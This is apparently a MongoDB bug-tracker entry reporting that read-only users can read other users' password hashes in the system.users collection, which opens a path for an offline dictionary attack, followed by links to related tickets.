Original Title: system.users collection placement allows offline dictionary attack for read-only users
When using authentication with mongodb, users with read-write permissions have their password hashes stored in system.users. Read-only users can read these hashes. This permits read-only users to read the password hashes of read/write users and perform an offline dictionary attack in order to escalate their privileges.
- is related to
-
SERVER-7604 On MongoS read-only users should be denied access to system.users collection
- Closed
-
SERVER-9009 mongodump fails when run by a read-only user
- Closed
-
TOOLS-134 Mongodump and mongoexport should skip collections they don't have read access to
- Closed
- related to
-
SERVER-6031 read only user can get write priority
- Closed